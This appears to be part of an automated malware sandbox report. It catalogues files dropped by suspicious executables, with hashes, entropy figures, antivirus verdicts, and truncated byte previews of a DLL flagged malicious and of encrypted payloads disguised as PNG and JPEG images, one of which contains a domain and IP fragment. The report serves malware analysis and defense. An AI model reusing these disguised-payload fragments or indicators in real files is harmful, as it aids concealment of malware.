                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):5059989
                                                                                          Entropy (8bit):7.999955227306662
                                                                                          Encrypted:true
                                                                                          SSDEEP:98304:aOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:1o6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                                          MD5:3C9205EAB82B6A2E98CEBE0893C623D6
                                                                                          SHA1:62A6488EACB2BF4E9C4196414596FAF15EE5B13A
                                                                                          SHA-256:57BF429F6929E8949E46C3771E20043F4788C3B204CE61740733F7990CEEED92
                                                                                          SHA-512:5EBA767911302CEF422851B98802BD9701C3608566A1487D01523090FB428049F770A90678973CAA101D952E22B010ECB0860D32AF73D9058D556E65EB61EA50
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..l..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                                                          Process:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4858192
                                                                                          Entropy (8bit):7.992516673019125
                                                                                          Encrypted:true
                                                                                          SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/o:9S4+O6P5OeMRrjRy7aPZbm3k8V/o
                                                                                          MD5:BBFE49A128333183EE39DD0B2824C406
                                                                                          SHA1:A5C99950B1B4F2FC2C0303092B6FB297D75F3B47
                                                                                          SHA-256:C855B6CFF6A4B1C470DCB9DBDF19CC4559AD93D8D2DCA0B16F878E92531BBE12
                                                                                          SHA-512:4544D09385B585657F0FD88265C6CBA0FE6EEA459F369ED3C44C01BEB073C46756CD2B23DD5379102EE35268EC4245B7594A378F80C212E779B9C1AC727727B2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\byHW9q\byHW9q.exe
                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                          Category:dropped
                                                                                          Size (bytes):365477
                                                                                          Entropy (8bit):7.99939965129237
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:YiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:P8u69CghoQxoMTFQqtKFCG7mbZ
                                                                                          MD5:7B2273DD374668CA4444D5B7F81D9F7C
                                                                                          SHA1:E1B74E5857753B996112D6538E1E162905B286FF
                                                                                          SHA-256:E63B72DA0D99233C46B18154900B282B4E58E70665FCD770D8FCA7B414325FEF
                                                                                          SHA-512:BB9A053D04ABD91753D377B772652A4C1EAAD57AB6824F0B30A1E2B9E41D74725F33CB19B88D750BEC575C455B87661999E4204BF3DC5CCECDA44E6BFBAAA723
                                                                                          Malicious:false
                                                                                          Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......p...............................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.47.169....."ijstuvwxyz....cvqthu.net......3#..............47.169....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                                                          Process:C:\Users\user\Documents\XY3LL0.exe
                                                                                          File Type:MIPSEB MIPS-III ECOFF executable
                                                                                          Category:modified
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:s:s
                                                                                          MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                                                                          SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                                                                          SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                                                                          SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:.@
                                                                                          Process:C:\Users\user\Documents\XY3LL0.exe
                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                          Category:dropped
                                                                                          Size (bytes):4859125
                                                                                          Entropy (8bit):7.999956261017207
                                                                                          Encrypted:true
                                                                                          SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                                          MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                                          SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                                          SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                                          SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                                          Malicious:false
                                                                                          Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):125333
                                                                                          Entropy (8bit):7.993522712936246
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                                                          MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                                                          SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                                                          SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                                                          SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                          Category:dropped
                                                                                          Size (bytes):8299
                                                                                          Entropy (8bit):7.9354275320361545
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                                                          MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                                                          SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                                                          SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                                                          SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                                                          Malicious:false
                                                                                          Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                                                                          Process:C:\Users\user\Documents\XY3LL0.exe
                                                                                          File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):5062442
                                                                                          Entropy (8bit):7.999518892518095
                                                                                          Encrypted:true
                                                                                          SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                                          MD5:70C21DA900796B279A09040B00953E40
                                                                                          SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                                          SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                                          SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):10681
                                                                                          Entropy (8bit):7.866148090449211
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                                                          MD5:10A818386411EE834D99AE6B7B68BE71
                                                                                          SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                                                          SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                                                          SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                                                          Process:C:\Users\user\Documents\XY3LL0.exe
                                                                                          File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):37274
                                                                                          Entropy (8bit):7.991781062764932
                                                                                          Encrypted:true
                                                                                          SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                                          MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                                          SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                                          SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                                          SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                                                          Process:C:\Users\user\Documents\XY3LL0.exe
                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                          Category:dropped
                                                                                          Size (bytes):55085
                                                                                          Entropy (8bit):7.99273647746538
                                                                                          Encrypted:true
                                                                                          SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                                          MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                                          SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                                          SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                                          SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                                          Malicious:false
                                                                                          Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):135589
                                                                                          Entropy (8bit):7.995304392539578
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                                                          MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                                                          SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                                                          SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                                                          SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):28272
                                                                                          Entropy (8bit):7.7115690393865535
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:9vegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQr:E5F1FUdy422IK+gAZt2i0YPpQn4GMA
                                                                                          MD5:711743729566E50108AEDF7B2949D90F
                                                                                          SHA1:0532A4172B7911C2339BECE6F0057EB5B98973D0
                                                                                          SHA-256:88B9CC2C2CDD70B5532D699F8750EA2F80DDA0EAE173A30F61E798A7CEF8DED2
                                                                                          SHA-512:1DC0815BA923177DF620AB605602BFC4CB6502E1BAE8EBF28420969B0345FE3E95133F8686E290030A90601C4A45451DDC91133EDCECFC37088270977DEC6099
                                                                                          Malicious:false
                                                                                          Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                                                                          Process:C:\Users\user\Documents\XY3LL0.exe
                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                          Category:dropped
                                                                                          Size (bytes):366410
                                                                                          Entropy (8bit):7.375315637594966
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                                          MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                                          SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                                          SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                                          SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                                          Malicious:false
                                                                                          Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............
                                                                                          Process:C:\Users\user\Desktop\2976587-987347589.08.exe
                                                                                          File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):3892010
                                                                                          Entropy (8bit):7.995495589600101
                                                                                          Encrypted:true
                                                                                          SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                                                          MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                                                          SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                                                          SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                                                          SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                                                          Process:C:\Users\user\Documents\XY3LL0.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):879
                                                                                          Entropy (8bit):4.5851931774575325
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                                          MD5:E54C4296F011EC91D935AA353C936E34
                                                                                          SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                                          SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                                          SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
